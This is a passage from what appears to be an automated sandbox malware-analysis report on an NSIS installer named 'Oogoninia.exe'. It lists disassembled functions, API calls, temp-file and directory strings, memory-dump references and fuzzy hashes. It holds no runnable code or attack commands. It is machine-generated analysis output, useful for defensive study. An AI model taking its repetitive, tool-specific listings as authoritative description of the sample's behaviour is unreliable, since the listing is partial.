                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseCreateValuelstrlen
                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsqBBFB.tmp
                                                                                                                                                                                    • API String ID: 1356686001-3724976337
                                                                                                                                                                                    • Opcode ID: 2eae85450b92eca2a3c37eaf8981f1ba2892586689a29081bc0333428de2e0a2
                                                                                                                                                                                    • Instruction ID: 00e854f1b6d20388f4b464fcc1b804607db5fe0ac9957b4d3390b69bb90c797e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2eae85450b92eca2a3c37eaf8981f1ba2892586689a29081bc0333428de2e0a2
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3921A1B1E00109BEEB00EFA4DE49EAF7A78EB50358F20403AF505B61D1C6B85D019B28
                                                                                                                                                                                    Function 00405A42 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 778 405a42-405a4c 779 405a4d-405a78 GetTickCount GetTempFileNameA 778->779 780 405a87-405a89 779->780 781 405a7a-405a7c 779->781 783 405a81-405a84 780->783 781->779 782 405a7e 781->782 782->783
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00405A56
                                                                                                                                                                                    • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 00405A70
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A45
                                                                                                                                                                                    • "C:\Users\user\Desktop\Oogoninia.exe", xrefs: 00405A42
                                                                                                                                                                                    • nsa, xrefs: 00405A4D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CountFileNameTempTick
                                                                                                                                                                                    • String ID: "C:\Users\user\Desktop\Oogoninia.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                                                    • API String ID: 1716503409-3045471738
                                                                                                                                                                                    • Opcode ID: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                                                                                                                                                    • Instruction ID: a3d8867ec022398f00e7cc0b64f9ef92c2764b579e17a6718397eb4594f2c545
                                                                                                                                                                                    • Opcode Fuzzy Hash: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 07F0E2327082047BDB108F55EC44B9B7B9CDF91750F10C037FE049A180D2B198448F59
                                                                                                                                                                                    Function 100016BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 802 100016bd-100016f9 call 10001a5d 806 1000180a-1000180c 802->806 807 100016ff-10001703 802->807 808 10001705-1000170b call 100021b0 807->808 809 1000170c-10001719 call 100021fa 807->809 808->809 814 10001749-10001750 809->814 815 1000171b-10001720 809->815 816 10001770-10001774 814->816 817 10001752-1000176e call 100023da call 10001559 call 10001266 GlobalFree 814->817 818 10001722-10001723 815->818 819 1000173b-1000173e 815->819 823 100017b2-100017b8 call 100023da 816->823 824 10001776-100017b0 call 10001559 call 100023da 816->824 839 100017b9-100017bd 817->839 821 10001725-10001726 818->821 822 1000172b-1000172c call 100027e8 818->822 819->814 825 10001740-10001741 call 10002aa3 819->825 827 10001733-10001739 call 10002589 821->827 828 10001728-10001729 821->828 834 10001731 822->834 823->839 824->839 837 10001746 825->837 843 10001748 827->843 828->814 828->822 834->837 837->843 844 100017fa-10001801 839->844 845 100017bf-100017cd call 100023a0 839->845 843->814 844->806 850 10001803-10001804 GlobalFree 844->850 852 100017e5-100017ec 845->852 853 100017cf-100017d2 845->853 850->806 852->844 855 100017ee-100017f9 call 100014e2 852->855 853->852 854 100017d4-100017dc 853->854 854->852 856 100017de-100017df FreeLibrary 854->856 855->844 856->852
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC4
                                                                                                                                                                                      • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC9
                                                                                                                                                                                      • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CCE
                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 10001768
                                                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 100017DF
                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                                                                                                                                      • Part of subcall function 100021B0: GlobalAlloc.KERNEL32(00000040,7D8BEC45), ref: 100021E2
                                                                                                                                                                                      • Part of subcall function 10002589: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,10001739,00000000), ref: 100025FB
                                                                                                                                                                                      • Part of subcall function 10001559: lstrcpyA.KERNEL32(00000000,?,00000000,10001695,00000000), ref: 10001572
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1196297422.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1196258164.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1196329175.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1196354573.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10000000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1791698881-3916222277
                                                                                                                                                                                    • Opcode ID: ee4c9fc9ebc314f30cf8369a5322713cb2bdaef71cd7754c4cd252d6b1501433
                                                                                                                                                                                    • Instruction ID: 7bd52774c71d274dd6e07030a7ef65efb9a892d3f5f2eddd47f658e3267813e4
                                                                                                                                                                                    • Opcode Fuzzy Hash: ee4c9fc9ebc314f30cf8369a5322713cb2bdaef71cd7754c4cd252d6b1501433
                                                                                                                                                                                    • Instruction Fuzzy Hash: B5319C79408205DAFB41DF649CC5BCA37ECFF042D5F018465FA0A9A09EDF78A8858B60
                                                                                                                                                                                    Function 00405900 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46stringCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 859 405900-40591b call 405da0 call 4058ab 864 405921-40592e call 40600b 859->864 865 40591d-40591f 859->865 869 405930-405934 864->869 870 40593a-40593c 864->870 866 405973-405975 865->866 869->865 871 405936-405938 869->871 872 405952-40595b lstrlenA 870->872 871->865 871->870 873 40595d-405971 call 405812 GetFileAttributesA 872->873 874 40593e-405945 call 4060a4 872->874 873->866 879 405947-40594a 874->879 880 40594c-40594d call 405859 874->880 879->865 879->880 880->872
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00405DA0: lstrcpynA.KERNEL32(?,?,00000400,0040322E,Leafier Setup,NSIS Error), ref: 00405DAD
                                                                                                                                                                                      • Part of subcall function 004058AB: CharNextA.USER32(?,?,C:\,?,00405917,C:\,C:\,766B3410,?,C:\Users\user\AppData\Local\Temp\,00405662,?,766B3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058B9
                                                                                                                                                                                      • Part of subcall function 004058AB: CharNextA.USER32(00000000), ref: 004058BE
                                                                                                                                                                                      • Part of subcall function 004058AB: CharNextA.USER32(00000000), ref: 004058D2
                                                                                                                                                                                    • lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,766B3410,?,C:\Users\user\AppData\Local\Temp\,00405662,?,766B3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405953
                                                                                                                                                                                    • GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,766B3410,?,C:\Users\user\AppData\Local\Temp\,00405662,?,766B3410,C:\Users\user\AppData\Local\Temp\), ref: 00405963
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                                    • String ID: C:\$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                    • API String ID: 3248276644-2214159804
                                                                                                                                                                                    • Opcode ID: 2b232cbcfe35a2a259e0e65083c3ab1013c8774cdbeba63489dc7f6696da3121
                                                                                                                                                                                    • Instruction ID: 7328fd33adb38864c40c3ad9044401c3b5e3aae7bd0e1b9e961d96be1e2df883
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2b232cbcfe35a2a259e0e65083c3ab1013c8774cdbeba63489dc7f6696da3121
                                                                                                                                                                                    • Instruction Fuzzy Hash: D5F0A466115D6096D722333A1C05B9F1A48CEC2374759453BF891F12D2DB3C8953DD7E
                                                                                                                                                                                    Function 00401FFF Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 0040202A
                                                                                                                                                                                      • Part of subcall function 00404FB9: lstrlenA.KERNEL32(0079DD20,00000000,0078FCF8,766B23A0,?,?,?,?,?,?,?,?,?,0040306B,00000000,?), ref: 00404FF2
                                                                                                                                                                                      • Part of subcall function 00404FB9: lstrlenA.KERNEL32(0040306B,0079DD20,00000000,0078FCF8,766B23A0,?,?,?,?,?,?,?,?,?,0040306B,00000000), ref: 00405002
                                                                                                                                                                                      • Part of subcall function 00404FB9: lstrcatA.KERNEL32(0079DD20,0040306B,0040306B,0079DD20,00000000,0078FCF8,766B23A0), ref: 00405015
                                                                                                                                                                                      • Part of subcall function 00404FB9: SetWindowTextA.USER32(0079DD20,0079DD20), ref: 00405027
                                                                                                                                                                                      • Part of subcall function 00404FB9: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040504D
                                                                                                                                                                                      • Part of subcall function 00404FB9: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405067
                                                                                                                                                                                      • Part of subcall function 00404FB9: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405075
                                                                                                                                                                                    • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 0040203A
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0040204A
                                                                                                                                                                                    • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 004020B4
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2987980305-0
                                                                                                                                                                                    • Opcode ID: dcd88b9650ca2fc532c8c5fc9ad8650594621bf6dfbf7b98fc17d5296bd1316f
                                                                                                                                                                                    • Instruction ID: 6acd92e4f6ebcd949653744c87f359efbc1ef98484dd96508818b65b31ed9250
                                                                                                                                                                                    • Opcode Fuzzy Hash: dcd88b9650ca2fc532c8c5fc9ad8650594621bf6dfbf7b98fc17d5296bd1316f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5921F671E00225EBDF307FA48F48AAE7A706B45354F20023BF701B22D1C6BE4A42D65E
                                                                                                                                                                                    Function 004015BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 004058AB: CharNextA.USER32(?,?,C:\,?,00405917,C:\,C:\,766B3410,?,C:\Users\user\AppData\Local\Temp\,00405662,?,766B3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058B9
                                                                                                                                                                                      • Part of subcall function 004058AB: CharNextA.USER32(00000000), ref: 004058BE
                                                                                                                                                                                      • Part of subcall function 004058AB: CharNextA.USER32(00000000), ref: 004058D2
                                                                                                                                                                                    • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                                                                                                                                                      • Part of subcall function 0040547F: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004054C2
                                                                                                                                                                                    • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\slavelivets,00000000,00000000,000000F0), ref: 0040163C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • C:\Users\user\slavelivets, xrefs: 00401631
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                                    • String ID: C:\Users\user\slavelivets
                                                                                                                                                                                    • API String ID: 1892508949-1403250623
                                                                                                                                                                                    • Opcode ID: 180f8dbed9302a858d7acc3d4175b887fc009ffc70d4c8ebc0bf4da9f8c84f7e
                                                                                                                                                                                    • Instruction ID: f4e9a0c94948f709858838e9eb50a0f2792b4ff72a3a1ac07d5dbe4c8cdc963c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 180f8dbed9302a858d7acc3d4175b887fc009ffc70d4c8ebc0bf4da9f8c84f7e
                                                                                                                                                                                    • Instruction Fuzzy Hash: D3112731508052EBDB217BB54D409BF26B09E92324B28457FF8D2B22E2D63D4D43A63F
                                                                                                                                                                                    Function 00405C87 Relevance: 4.5, APIs: 3, Instructions: 45registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(80000002,00405ECC,00000000,00000002,?,00000002,0011C6A5,?,00405ECC,80000002,Software\Microsoft\Windows\CurrentVersion,0011C6A5,Call,008BE61D), ref: 00405CB0
                                                                                                                                                                                    • RegQueryValueExA.KERNELBASE(0011C6A5,?,00000000,00405ECC,0011C6A5,00405ECC), ref: 00405CD1
                                                                                                                                                                                    • RegCloseKey.KERNELBASE(?), ref: 00405CF2
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3677997916-0
                                                                                                                                                                                    • Opcode ID: 0c8888e50600bbfc423f29d3e13c34afc4b2d72f1a725d9a4029968a390a76be
                                                                                                                                                                                    • Instruction ID: a78e2699c87532439836dc2b9ae7a1408ac691edae8af3cd19914ba1cc6957ae
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0c8888e50600bbfc423f29d3e13c34afc4b2d72f1a725d9a4029968a390a76be
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9C015A7254420AEFEB128F65EC45EEB3FACEF14354F004436F905A6220D235D964DBA5
                                                                                                                                                                                    Function 100027E8 Relevance: 3.2, APIs: 2, Instructions: 156memoryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • VirtualAllocEx.KERNELBASE(00000000), ref: 100028A7
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 100029AE
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1196297422.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1196258164.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1196329175.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1196354573.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10000000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AllocErrorLastVirtual
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 497505419-0
                                                                                                                                                                                    • Opcode ID: 7af5c486cb8ea8547353861cfd678fbd8d20862330e18d67419e74999799b2ae
                                                                                                                                                                                    • Instruction ID: 700bf99a33fcd989ee77f819fa46e2371db99389a88ce2eb288524e3b596c0af
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7af5c486cb8ea8547353861cfd678fbd8d20862330e18d67419e74999799b2ae
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9751A2BA908214DFFB10DF64DCC674937A4EB443D4F21842AEA08E726DCF34A9808B95
                                                                                                                                                                                    Function 00402483 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
